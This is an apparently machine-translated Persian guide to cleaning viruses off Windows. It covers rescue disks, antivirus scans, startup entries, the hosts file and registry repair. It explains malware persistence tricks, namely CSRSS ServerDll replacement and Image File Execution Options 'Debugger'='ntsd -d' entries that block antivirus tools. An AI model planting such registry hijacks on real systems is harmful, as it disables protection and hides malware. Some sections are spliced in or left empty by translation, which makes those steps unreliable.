    در آنجا همچنین می‌توانید "Dr.Web LiveCD" را دانلود کنید - یک تصویر دیسکی که به شما امکان می‌دهد عملکرد سیستمی را که تحت تأثیر ویروس‌ها قرار گرفته‌اند در ایستگاه‌های کاری و سرورهایی که Windows\Unix دارند بازیابی کنید، اطلاعات مهم را در رسانه‌های قابل جابجایی یا رایانه دیگری کپی کنید، اگر اقدامات برنامه های مخرب بوت کردن رایانه را غیرممکن کرد. Dr.Web LiveCD نه تنها به پاکسازی رایانه شما از فایل های آلوده و مشکوک کمک می کند، بلکه سعی می کند اشیاء آلوده را نیز درمان کند. برای از بین بردن ویروس، باید یک تصویر (فایلی با پسوند .iso) را از وب سایت DrWeb دانلود کنید و آن را در یک سی دی رایت کنید. یک دیسک بوت ایجاد می شود که پس از راه اندازی از آن توسط یک منوی ساده و واضح راهنمایی خواهید شد.

    اگر به دلایلی امکان استفاده از Dr.Web LiveCD وجود ندارد، می توانید اسکنر ضد ویروس Dr.Web CureIt! را امتحان کنید، که می تواند با راه اندازی در سیستم عامل دیگری، به عنوان مثال، با استفاده از Winternals ERD Commander، راه اندازی شود. برای اسکن یک سیستم آلوده، باید هارد دیسک آن را مشخص کنید (حالت اسکن سفارشی). اسکنر به شما کمک می کند فایل های ویروس را پیدا کنید و تنها کاری که باید انجام دهید این است که ورودی های مرتبط با آن را از رجیستری پاک کنید.
    از آنجایی که ویروس‌ها یاد گرفته‌اند که برای راه‌اندازی در حالت راه‌اندازی ایمن ثبت نام کنند، بررسی شعبه رجیستری ضرری ندارد:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
بخش ها:
حداقل- لیست درایورها و خدمات راه اندازی شده در حالت ایمن
شبکه- همان، اما با پشتیبانی شبکه.

اجازه دهید اضافه کنم که یک روت کیت کلاس جدید وجود دارد که نماینده آن است BackDoor.MaosBoot، در پایان سال 2007 ظاهر شد. این برنامه تروجان خود را در بخش بوت هارد دیسک می نویسد و از نصب پنهان درایور خود در حافظه اطمینان می دهد. خود درایور Rootkit مستقیماً در آخرین بخش‌های دیسک فیزیکی نوشته می‌شود و سیستم فایل را دور می‌زند و در نتیجه حضور خود را روی دیسک پنهان می‌کند. به طور کلی، این اصل جدید نیست؛ حدود ده سال پیش، بدافزارها به روشی مشابه در مسیرهای پشتیبان فلاپی دیسک و دیسک های سخت پنهان شد، اما معلوم شد که بسیار موثر است، زیرا اکثر آنتی ویروس ها هنوز نمی توانند با این کار کنار بیایند. از حذف BackDoor.MaosBoot. بخش بوت که در بالا ذکر شد بررسی نمی شود و بخش های انتهای دیسک برای آن به هیچ وجه با سیستم فایل مرتبط نیستند و طبیعتاً چنین روت کیت را شناسایی نمی کند. درست است، Dr.Web (و در نتیجه Cureit) به خوبی با BackDoor.MaosBoot کنار می آید.

    اگر در مورد هر فایلی شک دارید، می توانید از سرویس آنتی ویروس آنلاین رایگان virustotal.com استفاده کنید. با استفاده از فرم مخصوص در صفحه اصلی سایت، فایل مشکوکی را آپلود کنید و منتظر نتیجه باشید. سرویس virustotal از نسخه های کنسولی بسیاری از آنتی ویروس ها برای اسکن فایل مشکوک شما استفاده می کند. نتایج روی صفحه نمایش داده می شود. اگر فایل مخرب باشد، با احتمال زیاد، می توانید آن را تعیین کنید. تا حدودی می توان از این سرویس برای انتخاب "بهترین آنتی ویروس" استفاده کرد.
پیوند به یکی از موضوعات انجمن در وب سایت virusinfo.info، جایی که کاربران پیوندهایی را به منابع مختلف اختصاص داده شده برای محافظت در برابر ویروس، از جمله. و بررسی آنلاین کامپیوتر، مرورگر، فایل‌ها...

    گاهی اوقات، در نتیجه اقدامات نادرست یک ویروس (یا آنتی ویروس)، بارگیری سیستم به طور کلی متوقف می شود. بگذارید یک مثال معمولی برای شما بزنم. برنامه های مخرب سعی می کنند با استفاده از روش های مختلف، از جمله روش های نسبتاً غیر معمول، به سیستم نفوذ کنند. در طی فرآیند بوت اولیه، حتی قبل از ثبت نام کاربر، "Session Manager" (\SystemRoot\System32\smss.exe) راه اندازی می شود که وظیفه آن راه اندازی زیرسیستم ها و خدمات (سرویس ها) سطح بالای سیستم عامل است. در این مرحله فرآیندهای CSRSS (فرآیند زمان اجرا سرور سرویس گیرنده)، WINLOGON (ورود به ویندوز)، LSASS (پوسته LSA) و سایر خدمات با پارامتر Start=2 از کلید رجیستری شروع می شوند.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services

    اطلاعات در نظر گرفته شده برای مدیر جلسه در کلید رجیستری قرار دارد

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager

یکی از راه های نفوذ به سیستم، جایگزینی فایل DLL برای CSRSS است. اگر به مطالب پست نگاه کنید

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems

سپس معانی را خواهید یافت

ServerDll=basesrv, ServerDll=winsrv. کتابخانه های basesrv.dll و winsrv.dll فایل های سیستمی "صحیح" هستند که توسط سرویس CSRSS روی یک سیستم معمولی (غیر آلوده) بارگذاری می شوند. این ورودی رجیستری را می توان به ورودی تغییر داد که بارگیری را تضمین می کند، به عنوان مثال، به جای basesrv.dll، basepvllk32.dll مخرب:

ServerDll=basepvllk32 (یا dll دیگری غیر از basesrv و winsrv)

این تضمین می کند که بدافزار در راه اندازی مجدد بعدی کنترل را به دست می آورد. اگر آنتی ویروس شما basepvllk32 تعبیه شده را شناسایی و حذف کند و ورودی رجیستری را دست نخورده باقی بگذارد، بوت سیستم با صفحه آبی مرگ (BSOD) با خطای STOP c000135 و پیامی مبنی بر عدم امکان بارگیری basepvllk32 به پایان می رسد.

شما می توانید وضعیت را به این صورت بهبود بخشید:

در کنسول بازیابی (یا هر سیستم دیگری) بوت کنید و فایل basesrv.dll را از پوشه C:\WINDOWS\system32 در همان پوشه با نام basepvllk32.dll کپی کنید. پس از آن سیستم بوت می شود و می توانید به صورت دستی ورودی رجیستری را ویرایش کنید.
- با استفاده از Winternals ERD Commander بوت شده و ورودی رجیستری را تصحیح کنید ServerDll=basesrv. یا با استفاده از یک نقطه بازیابی سیستم را به عقب برگردانید.

    یک مثال معمولی دیگر. بدافزار به عنوان یک دیباگر برای فرآیند explorer.exe ثبت می شود و یک ورودی رجیستری مانند:

"Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
حذف wuauclt.exe با آنتی ویروس بدون حذف ورودی رجیستری، راه اندازی explorer.exe را غیرممکن می کند. در نتیجه، یک دسکتاپ خالی، بدون هیچ دکمه یا میانبر دریافت می کنید. با استفاده از کلید ترکیبی CTRL-ALT-DEL می توانید از وضعیت خارج شوید. "Task Manager" - "New Task" - "Browse" را انتخاب کنید - ویرایشگر رجیستری regedit.exe را پیدا و راه اندازی کنید. سپس کلید را حذف کنید
HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
و راه اندازی مجدد

    در زمانی که دقیقاً می دانید سیستم چه زمانی آلوده شده است، بازگشت به نقطه بازیابی قبل از این رویداد یک راه نسبتاً مطمئن برای خلاص شدن از شر عفونت است. گاهی اوقات منطقی است که همانطور که در مقاله "مشکلات بارگیری سیستم عامل" در بخش "Windows" توضیح داده شده است، نه یک بازگشت کامل، بلکه جزئی، بازیابی فایل رجیستری SYSTEM انجام دهید.

    == می 2008. ==

اضافه شدن

    این افزوده یک سال پس از نگارش مقاله اصلی ظاهر شد. در اینجا تصمیم گرفتم جالب ترین راه حل هایی را که در روند مبارزه با بدافزارها به وجود آمد را پست کنم. مثل یادداشت های کوتاه.

پس از حذف ویروس، هیچ آنتی ویروسی کار نمی کند.

    مورد جالب است زیرا روش مسدود کردن نرم‌افزار ضد ویروس را می‌توان در مبارزه با فایل‌های ویروسی اجرایی نیز استفاده کرد. همه چیز با این واقعیت شروع شد که پس از حذف یک ویروس نسبتاً ابتدایی، آنتی ویروس Stream دارای مجوز کار نکرد. نصب مجدد و تمیز کردن رجیستری کمکی نکرد. تلاش برای نصب Avira Antivir Personal Free موفقیت آمیز بود، اما خود آنتی ویروس شروع نشد. پیامی در گزارش سیستم در مورد مهلت زمانی راه اندازی سرویس "Avira Antivir Guard" وجود دارد. راه اندازی مجدد دستی با همان خطا به پایان رسید. علاوه بر این، هیچ فرآیند غیر ضروری در سیستم در حال اجرا نبود. صد در صد اطمینان وجود داشت که هیچ ویروس، روت کیت یا سایر چیزهای بد (بدافزار) در سیستم وجود ندارد.
    در برخی مواقع سعی کردم ابزار ضد ویروس AVZ را اجرا کنم. اصل عملیاتی AVZ تا حد زیادی مبتنی بر جستجوی ناهنجاری های مختلف در سیستم مورد مطالعه است. از یک طرف، این به جستجوی بدافزار کمک می کند، اما از طرف دیگر، کاملاً طبیعی است که به اجزای آنتی ویروس ها، ضد جاسوس افزارها و سایر نرم افزارهای قانونی که به طور فعال با سیستم تعامل دارند مشکوک شویم. برای سرکوب پاسخ AVZ به اشیاء قانونی و ساده کردن تجزیه و تحلیل نتایج اسکن سیستم با علامت گذاری اشیاء قانونی با رنگ و فیلتر کردن آنها از سیاهه ها، از پایگاه داده ای از فایل های AVZ ایمن استفاده می شود. اخیراً یک سرویس کاملاً خودکار راه اندازی شده است که به همه اجازه می دهد فایل ها را برای پر کردن این پایگاه داده ارسال کنند.
اما: فایل اجرایی avz.exe شروع نشد! من avz.exe را به musor.exe تغییر نام دادم - همه چیز خوب شروع می شود. بار دیگر، AVZ تبدیل به یک دستیار ضروری در حل مشکل شد. هنگام انجام بررسی، خطوط زیر در نتایج ظاهر شد:

خطر - دیباگر پردازش "avz.exe"="ntsd-d"
خطر - دیباگر پردازش "avguard.exe"="ntsd-d"
:.

این قبلاً یک هدایت جدی بود. جستجو در رجیستری با استفاده از متن "avz" منجر به کشف در موضوع شد.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

بخش با نام avz.exeحاوی پارامتر رشته ای به نام "اشکال زدا"و معنی
و همانطور که بعدا مشخص شد، در شعبه مشخص شده نه تنها بخش "avz.exe" بلکه بخش هایی با نام ماژول های اجرایی تقریباً همه آنتی ویروس های شناخته شده و برخی از ابزارهای نظارت بر سیستم وجود دارد. ntsd.exe خود یک دیباگر کاملا قانونی ویندوز است که به طور استاندارد در همه نسخه های سیستم عامل وجود دارد، اما چنین ورودی رجیستری راه اندازی برنامه ای را که نام فایل اجرایی آن با نام بخش ???.exe مطابقت دارد غیرممکن می کند.

    پس از حذف از رجیستری تمام بخش هایی با نام ???.exe و حاوی ورودی "Debugger" = "ntsd -d"، عملکرد سیستم به طور کامل بازیابی شد.

در نتیجه تجزیه و تحلیل وضعیت با استفاده از پارامتر "ntsd -d" برای جلوگیری از راه اندازی فایل های اجرایی، این ایده به وجود آمد که از همان تکنیک برای مبارزه با ویروس ها استفاده شود. البته، این یک نوشدارویی نیست، اما تا حدی می تواند خطر آلوده شدن رایانه شما به ویروس هایی با نام فایل های اجرایی شناخته شده را کاهش دهد. تا اجرای فایل هایی با نام های ntos.exe، file.exe، system32.exe و ... بر روی سیستم غیرممکن شود. می توانید یک فایل reg برای وارد کردن به رجیستری ایجاد کنید:

ویرایشگر رجیستری ویندوز نسخه 5.00

"اشکال زدا"="ntsd -d"
"اشکال زدا"="ntsd -d"
"اشکال زدا"="ntsd -d"
:.. و غیره.

لطفاً توجه داشته باشید که نام پارتیشن حاوی مسیر فایل نیست، بنابراین این روش را نمی توان برای فایل های ویروسی که نام آنها با نام فایل های اجرایی قانونی مطابقت دارد استفاده کرد، اما خود فایل ها به صورت غیر استاندارد در سیستم فایل قرار دارند. برای مثال، Explorer.exe در پوشه \WINDOWS\ قرار دارد و ویروس در جای دیگری - در ریشه دیسک، در پوشه \temp، \windows\system32\ قرار دارد. اگر پارتیشنی به نام "Explorer" ایجاد کنید. exe" - سپس پس از ورود به سیستم، یک دسکتاپ خالی خواهید داشت زیرا File Explorer راه اندازی نمی شود. بدتر از آن، اگر پارتیشنی با نام مشابه یک سرویس سیستم ایجاد کنید (winlogon.exe، csrss.exe، smss.exe، services.exe، lsass.exe)، در نهایت با یک سیستم از کار افتاده مواجه خواهید شد. اگر ویروس در C:\temp\winlogon.exe قرار داشته باشد و ماژول لاگین قانونی C:\WINDOWS\SYSTEM32\winlogon.exe باشد، ایجاد یک پارتیشن به نام winlogon.exe باعث می شود که سرویس winlogon قادر به راه اندازی نباشد و خرابی سیستم با صفحه آبی مرگ (BSOD).

    اما، با این حال، نباید امیدوار باشید که کد درخواست شده توسط ویروس در هر مورد خاص مناسب باشد. همانطور که نباید امیدوار باشید که ویروس صادقانه خود را نابود کند، و حتی بیشتر از آن، نباید پیامک ارسال کنید. هر ویروسی را می توان حذف کرد، حتی اگر توسط آنتی ویروس ها شناسایی نشود. روش‌های حذف یک ویروس باج‌افزار هیچ تفاوتی با روش‌های حذف هر بدافزار دیگر ندارد، شاید با یک تفاوت - شما نباید زمان را برای مقابله با مزخرفات در محیط یک سیستم آلوده تلف کنید، به جز اینکه شاید مهارت‌های خود را توسعه دهید. و دانش خود را گسترش دهید.

ساده ترین و مؤثرترین راه این است که با استفاده از یک سیستم غیر آلوده دیگر بوت کنید و با اتصال به یک سیستم آلوده، فایل های ویروس را حذف کنید و ورودی هایی را که در رجیستری ایجاد کرده است تصحیح کنید. قبلاً در قسمت اصلی مقاله در مورد این مطلب نوشتم، اما در اینجا به سادگی سعی می کنم چند گزینه مختصر برای از بین بردن ویروس را بیان کنم.

استفاده از Dr.Web LiveCD ساده ترین راه است و نیاز به دانش خاصی ندارد. تصویر iso سی دی را دانلود کنید، آن را روی دیسک رایت کنید، از CD-ROM بوت کنید و اسکنر را راه اندازی کنید.

با استفاده از Winternals ERD Commander. از آن بوت می‌شوید، به سیستم آلوده متصل می‌شوید و به نقطه بازیابی با تاریخ قبل از وقوع عفونت برمی‌گردید. یک منو انتخاب کنید ابزارهای سیستم - بازیابی سیستم. اگر با استفاده از ERD Commander نمی توان بازگشتی را انجام داد، سعی کنید فایل های رجیستری را به صورت دستی در داده های چک پوینت پیدا کنید و آنها را به فهرست ویندوز بازیابی کنید. نحوه انجام این کار را در مقاله "کار با رجیستری" به طور مفصل شرح دادم.

بوت شدن در سیستم عامل دیگری و حذف دستی ویروس. سخت ترین، اما موثرترین راه. استفاده از همان ERD Commander به عنوان سیستم عامل دیگر راحت تر است. روش شناسایی و حذف ویروس می تواند به شرح زیر باشد:

به دیسک سیستم آلوده بروید و دایرکتوری های سیستم را برای فایل های اجرایی و فایل های درایور با تاریخ ایجاد نزدیک به تاریخ آلودگی اسکن کنید. این فایل ها را به یک پوشه جداگانه منتقل کنید. به کاتالوگ ها دقت کنید

\پنجره ها
\ویندوز\system32
\ویندوز\system32\drivers
\ویندوز\Tasks\
\بازیافت کننده
\ اطلاعات حجم سیستم
دایرکتوری های کاربر \Documents And Settings\All Usersو \Documents And Settings\نام کاربری

استفاده از FAR Manager برای جستجوی چنین فایل‌هایی بسیار راحت است و مرتب‌سازی بر اساس تاریخ برای پانلی که محتویات فهرست نمایش داده می‌شود (ترکیب CTRL-F5) فعال است. توجه ویژه ای باید به فایل های اجرایی مخفی شود. همچنین یک ابزار موثر و ساده از Nirsoft - SearchMyFiles وجود دارد که استفاده از آن در اکثر موارد به راحتی می تواند فایل های مخرب را حتی بدون استفاده از آنتی ویروس شناسایی کند. روشی برای شناسایی فایل های مخرب بر اساس زمان ایجاد

به رجیستری سیستم آلوده متصل شوید و در آن لینک نام این فایل ها را جستجو کنید. خود رجیستری مانع از آن نمی شود که ابتدا آن را کپی کنید (به طور کامل یا حداقل قسمت هایی که لینک های بالا در آنها یافت می شود). شما خود پیوندها را حذف می کنید یا نام فایل های موجود در آنها را به دیگران تغییر می دهید، به عنوان مثال - file.exe به file.ex_، server.dll به server.dl_، driver.sys به driver.sy_.

این روش نیاز به دانش خاصی ندارد و در مواردی که ویروس تاریخ اصلاح فایل های خود را تغییر نمی دهد (و این هنوز بسیار نادر است) تأثیر مثبتی دارد. حتی اگر ویروس توسط آنتی ویروس ها شناسایی نشود.

اگر روش های قبلی نتیجه ای نداشت، یک چیز باقی می ماند - جستجوی دستی برای گزینه های احتمالی برای راه اندازی ویروس. در منو ابزار اداریفرمانده ERD" و مواردی وجود دارد:

خودکار اجرا می شود- اطلاعات در مورد پارامترهای راه اندازی برنامه و پوسته کاربر.
مدیر سرویس و راننده- اطلاعات در مورد خدمات سیستم و درایورها.

- در ادامه مبحث نحوه خلاص شدن از شر ویروس ها با استفاده از ابزارهای استاندارد سیستم عامل Windows Vista\Windows 7 استفاده از حالت ایمن با پشتیبانی از خط فرمان.

با استفاده از دیسک بوت Winternals ERD Commander- دستورالعمل های دقیق برای استفاده از دیسک بازیابی اضطراری سیستم ایجاد شده بر اساس Microsoft Diagnostic and Recovery Toolset (MS DaRT).

وب سایت اولگ زایتسف، نویسنده AVZ.- اختصاص به امنیت اطلاعات، و به ویژه به استفاده از یکی از موثرترین ابزارهای ضد ویروس AVZ.

بازیابی سیستم پس از عفونت ویروسینحوه بازیابی عملکرد ویندوز پس از حذف ویروسی که به برخی از تنظیمات آسیب رسانده است. در مواردی که برنامه ها شروع نمی شوند، هنگامی که صفحات باز شده توسط مرورگر جایگزین می شوند، هنگامی که صفحه اصلی یا صفحه جستجو جایگزین می شود، هنگامی که تنظیمات دسکتاپ تغییر می کند، ویرایشگر رجیستری قادر به شروع نمی باشد، به اینترنت دسترسی ندارد، کمک می کند. ، برخی از سایت ها در دسترس نیستند و غیره.

این امکان وجود دارد که شما نیاز به حذف یک پوشه داشته باشید، اما Vidnovs 7 شما را از انجام این عمل منع می کند. خطاها با متن "پوشه قبلاً در حال استفاده است" ظاهر می شوند. حتی اگر کاملاً مطمئن هستید که شی فاقد ارزش است و نیاز به حذف فوری دارد، سیستم به شما اجازه انجام این عمل را نمی دهد.

به احتمال زیاد، این مشکل به دلیل اشغال پوشه در حال حذف توسط یک برنامه شخص ثالث است. اما حتی پس از بسته شدن همه برنامه هایی که می توان در آن استفاده کرد، پوشه ممکن است حذف نشود. به عنوان مثال، یک ذخیره سازی الکترونیکی داده ممکن است به دلیل عملکرد نادرست کاربر مسدود شود. این عناصر روی هارد دیسک به "وزن مرده" تبدیل می شوند و بیهوده حافظه را اشغال می کنند.

روش 1: توتال فرمانده

محبوب ترین و کاربردی ترین فایل منیجر Total Commander است.

روش 2: مدیر FAR

مدیر فایل دیگری که می تواند به شما در حذف اشیاء غیرقابل حذف کمک کند.

روش 3: باز کردن قفل

Unlocker کاملا رایگان است و به شما امکان می دهد پوشه ها و فایل های محافظت شده یا قفل شده را در ویندوز 7 حذف کنید.

روش 4: FileASSASIN

ابزار FileASSASIN می تواند فایل ها و پوشه های قفل شده را حذف کند. اصل کار بسیار شبیه Unlocker است.

تعدادی برنامه مشابه وجود دارد که می توانید با استفاده از لینک زیر با آنها آشنا شوید.

روش 5: تنظیمات پوشه

این روش نیازی به ابزارهای شخص ثالث ندارد و پیاده سازی آن بسیار آسان است.

روش 6: Task Manager

شاید این خطا به دلیل یک فرآیند در حال اجرا در داخل پوشه رخ دهد.

روش 7: حالت ایمن ویندوز 7

در حالت امن وارد سیستم عامل ویندوز 7 می شویم.

اکنون پوشه مورد نیاز را پیدا کرده و سعی می کنیم آن را در این حالت سیستم عامل حذف کنیم.

در برخی موارد، راه اندازی مجدد سیستم به طور منظم ممکن است کمک کند. ویندوز 7 را از طریق منو راه اندازی مجدد کنید "شروع".

آلوده کردن رایانه به ویروس موضوع جدیدی برای هر کاربر رایانه نیست. هنگام بارگذاری سیستم عامل، پنجره های اطلاعات مختلفی ظاهر می شود، برخی از برنامه ها به درستی کار نمی کنند، صفحه شروع مرورگر تغییر می کند و افزونه های مختلفی نصب می شود. همچنین اتفاق می افتد که کامپیوتر برای مدت زمان طولانی اصلا روشن نمی شود یا بوت می شود، سپس در حین کار کند می شود.

اگر حداقل یکی از علائم بالا را دارید، قطعاً به ویروس مبتلا شده اید. بنابراین، بیایید دریابیم که با چه روش هایی می توانید ویروس را از رایانه خود حذف کنید.

استفاده از آنتی ویروس ها

اولین کاری که باید انجام دهید این است که کامپیوتر خود را با استفاده از یک برنامه آنتی ویروس نصب شده اسکن کنید. من Avast را نصب کرده ام، بنابراین آن را در آن نشان می دهم. نماد مربوطه را در سینی پیدا کنید و با ماوس روی آن کلیک کنید.

پنجره اصلی برنامه باز می شود. اکنون مطمئن شوید که آخرین نسخه تعریف ویروس را نصب کرده اید: در "تنظیمات" به برگه "به روز رسانی" بروید. ببینید آخرین به‌روزرسانی چه زمانی دریافت شده است، در صورت لزوم، روی دکمه «به‌روزرسانی» کلیک کنید.

از لیست کشویی انتخاب کنید "اسکن کامل"و روی Start کلیک کنید. اگر برنامه آنتی ویروس دیگری نصب کرده اید، همان مورد را در آن پیدا کنید و اسکن کامل رایانه خود را فعال کنید.

بنابراین، ما یک اسکن کامل از رایانه شما برای ویروس ها انجام می دهیم. این فرآیند زمان زیادی را می برد - 11 ساعت، با این حال، همه اینها بستگی به مقدار اطلاعات ذخیره شده در رایانه دارد - هر چه حجم آن بیشتر باشد، بررسی بیشتر طول می کشد.

هنگامی که فرآیند به طور کامل تکمیل شد، سعی کنید تهدیدات شناسایی شده را ضد عفونی کنید. اگر این کار نمی تواند انجام شود، بهتر است آنها را حذف کنید.

بهتر است با یک آنتی ویروس دیگر کامپیوتر را برای یافتن ویروس اسکن کنیم: مثلا Dr.Web CureIt یا AVP Tool. استفاده از این برنامه ها در خانه کاملا رایگان است، اما برای مقاصد تجاری نیست. علاوه بر این، آنها نیازی به نصب بر روی رایانه ندارند - هیچ تضادی با آنتی ویروس نصب شده وجود نخواهد داشت.

می توانید Dr.Web CureIt را از وب سایت رسمی با دنبال کردن لینک دانلود کنید:
https://free.drweb.ru/download+cureit+free/

AVP Tool ابزاری از آزمایشگاه Kaspersky است که رایانه کاربر از قبل آلوده را درمان می کند. آن را از وب سایت رسمی با استفاده از لینک دانلود کنید:
http://www.kaspersky.ru/antivirus-removal-tool

بهتر است برنامه ها را از وب سایت رسمی دانلود کنید تا آخرین به روز رسانی های پایگاه داده ویروس ها نصب شود.

برای اسکن رایانه خود با یکی از ابزارهایی که انتخاب کرده اید، به حالت امن بروید: هنگام بارگیری سیستم عامل، دکمه F8 را فشار دهید. اکنون برنامه را اجرا کرده و یک اسکن کامل انجام دهید.

پس از تکمیل فرآیند، سعی کنید تهدیدات یافت شده را ضدعفونی یا حذف کنید. لطفاً توجه داشته باشید که حذف برخی از فایل‌ها ممکن است در عملکرد برخی از برنامه‌های غیرقانونی اختلال ایجاد کند.

درمان کامپیوتر شما برای ویروس ها با استفاده از برنامه های آنتی ویروس به ما تضمین 100٪ تمیز بودن آن را نمی دهد. برای انجام این کار، باید چند مرحله دیگر را انجام دهید.

حذف برنامه های نامفهوم از راه اندازی

در این مرحله شما نیاز دارید، یا آنهایی که به ندرت استفاده می کنید. ترکیب Win+R را فشار دهید و در خط "Run" دستور msconfig را بنویسید و روی "OK" کلیک کنید.

پنجره ای باز خواهد شد. برنامه هایی که همراه با سیستم عامل اجرا می شوند در اینجا علامت گذاری شده اند. راه اندازی همه برنامه هایی را که نیاز ندارید غیرفعال کنید: علامت کادرهای کنار آنها را بردارید. به دنبال برنامه های نامشخص در لیست، با مکان یا سازنده نامشخص باشید.

پس از اتمام، روی Apply و OK کلیک کنید.

اگر مطمئن نیستید که آیتم خاصی را از لیست غیرفعال کنید، روی آن در بخش "Command" نگه دارید و به محل فایل نگاه کنید. سپس آن را از طریق File Explorer پیدا کنید و تاریخ دانلود آن را یادداشت کنید. اگر این در همان روزهایی بود که رایانه آلوده شده بود، می توانید با خیال راحت علامت کادر را بردارید.

ویدئو با موضوع:

بررسی برنامه های اخیرا نصب شده

برای انجام این کار، به "شروع" بروید - "صفحه کنترل" – "برنامه ها و ویژگی های".

در پنجره بعدی، روی ستون "نصب شده" کلیک کنید و آخرین برنامه های نصب شده را مشاهده کنید. اگر در بین آنها مواردی وجود دارد که نصب نکرده اید (نام و محتوای نامفهوم، نامعلوم) - با ماوس روی آن کلیک کنید و روی "حذف" کلیک کنید.

برای جلوگیری از به جا گذاشتن ردی از برنامه های کاربردی، از آن در رایانه شخصی خود استفاده کنید. این کار را می توان به صورت دستی یا با استفاده از ابزارهای ویژه انجام داد.

ویدئو با موضوع:

بررسی فرآیندها در Task Manager

با توجه به بار CPU، ممکن است عملکرد رایانه شما به میزان قابل توجهی کاهش یابد. اگر قبلاً هیچ مشکل یا فریز وجود نداشت، اما اکنون شما این مشکل را تجربه می کنید، ممکن است این نتیجه یک برنامه مخرب باشد.

بر روی دکمه "شروع" کلیک کنید و در نوار جستجو وارد شوید "مدیر وظایف"، سپس Enter را فشار دهید.

در اینجا، به تب "Processes" بروید و مطمئن شوید که ستون "CPU" مقادیر خیلی بزرگی ندارد. اگر مورد مشکوکی متوجه شدید، روی این خط راست کلیک کرده و از منوی زمینه انتخاب کنید "باز کردن محل ذخیره فایل".

محل فایل از طریق Explorer باز می شود. نگاه کنید "تغییر تاریخ"فایل. اگر با تاریخی که ظاهراً ویروس را گرفتید مطابقت دارد، این فایل را حذف کرده و به آن برگردید "مدیر وظایف"، خط مورد نظر را با ماوس هایلایت کرده و کلیک کنید "پایان فرآیند".

حذف فایل های موقت

در این مرحله ما تمام فایل های موقت را در آن ذخیره می کنیم. ابتدا باید قابلیت مشاهده فایل ها و پوشه ها را فعال کنید. به "شروع" بروید - "صفحه کنترل" – "تنظیمات پوشه ها".

در پنجره بعدی، به تب "View" بروید و یک نشانگر در کنار آیتم قرار دهید "نمایش فایل ها، پوشه ها و درایوهای مخفی". روی «اعمال» و «OK» کلیک کنید.

ما به دنبال پوشه "Temp" دیگری در رایانه هستیم:

ج: – کاربران – نام حساب شما– AppData – Local – Temp

تمام فایل ها را نیز از آن پاک کنید.

ویدئو با موضوع:

بررسی فایل هاست

گاهی اوقات ویروس ها می توانند به فایل میزبان دسترسی پیدا کنند. به مسیر زیر بروید:

ج: – ویندوز – System32 – درایورها – و غیره

روی فایلی به نام “hosts” کلیک راست کرده، “Open” را انتخاب کرده و با Notepad آن را باز کنید.

برای سیستم عامل ویندوز 7، فایل باید حاوی متنی مانند شکل زیر باشد.

برای کاهش درخواست ها به حافظه نهان DNS و سرورهای DNS، صفحات اینترنتی که اغلب بارگیری می شوند نیز می توانند در فایل میزبان ثبت شوند. اگر اطلاعات مشکوکی در آنجا مشاهده کردید، آن را حذف کنید.

اگر به پوشه مورد نظر رفتید و فایل host را پیدا نکردید، ممکن است به دلیل ویروس باشد. همانطور که در بالا توضیح داده شد، نمایان بودن فایل‌ها و پوشه‌های مخفی را روشن کنید. سپس فایل hosts ظاهر شده را باز کنید و ببینید که متن پیش فرض در آنجا نوشته شده است.

اگر تغییر کرد، همه چیز را همانطور که باید بنویسید. اگر فایل قابل ویرایش نیست، یک فایل جدید با پسوند .txt و نام میزبان ایجاد کنید و تمام متن را بنویسید، مانند شکل بالا - برای سیستم عامل ویندوز 7. برای سیستم عامل های دیگر، متن متفاوت است، بنابراین در اینترنت جستجو کنید

پاک کردن رجیستری

اگر برنامه مشکوکی را از طریق حذف کرده اید، باید این کار را انجام دهید "برنامه ها و ویژگی های"، یا یک فایل ناشناخته را در فرآیندها خاتمه داد.

برای باز کردن ویرایشگر رجیستری، ترکیب Win+R را فشار دهید. سپس در پنجره Run دستور regedit را بنویسید و OK کنید.

اکنون در تب "Edit"، "Find" را انتخاب کنید یا Ctrl+F را فشار دهید. در نوار جستجو، نام برنامه یا بخشی از نامی که از طریق آن حذف کرده اید را وارد کنید "برنامه ها و ویژگی های"یا "نصب و حذف برنامه ها". همچنین می توانید نام فایلی را که کار آن را در فرآیندها انجام داده اید در نوار جستجو وارد کنید.

اگر یک شاخه رجیستری یا یک پارامتر با نام یافت شد، باید حذف شود - پارامتر یا شاخه رجیستری را با ماوس انتخاب کنید و روی Delete کلیک کنید.

پاک کردن کش مرورگر و حذف افزونه ها

اگر ویروس با مرورگر مرتبط باشد، ابتدا بررسی می کنیم که میانبرهای ایجاد شده در دسکتاپ به کجا هدایت می شوند. برای انجام این کار، روی میانبر مرورگر کلیک راست کرده و به "Properties" بروید.

در اینجا در قسمت "Object"، بررسی کنید که پیوند به درایو و پوشه ای که مرورگر در آن نصب شده است منتهی شود. اگر پیوند به فایل مشکوکی اشاره کرد، میانبر را حذف کرده و دوباره ایجاد کنید.

برای پاک کردن کش مرورگر خود از یک برنامه خاص مانند CCleaner استفاده کنید. آن را دانلود، نصب و بر روی کامپیوتر خود اجرا کنید. سپس در قسمت «تمیز کردن» در تب «برنامه‌ها»، موارد مورد نیاز را انتخاب کنید، روی «تحلیل» و سپس «تمیز کردن» کلیک کنید.

اکنون به برگه «افزونه‌ها» بروید، اگر برنامه‌های افزودنی در آنجا نصب شده‌اند که نام‌های نامشخصی دارند یا خودتان آن‌ها را نصب نکرده‌اید، روی «حذف» کلیک کنید.

ساخت سی دی زنده

اگر رایانه شما توسط ویروس مسدود شده باشد، این برای شما مفید خواهد بود: روشن می شود، اما سیستم عامل بارگیری نمی شود. چگونه یک سی دی زنده را روی فلش مموری یا دیسک رایت کنید و کامپیوتر خود را تمیز کنید، مقاله را با دنبال کردن لینک بخوانید.

برای انجام این کار، به رایانه دیگری نیاز دارید که می توانید تصویر را از آن دانلود کنید، یک دیسک خالی یا درایو فلش. همچنین باید اولویت بوت را در بایوس تغییر دهید. همچنین می توانید با دنبال کردن لینک مقاله در این مورد مطالعه کنید.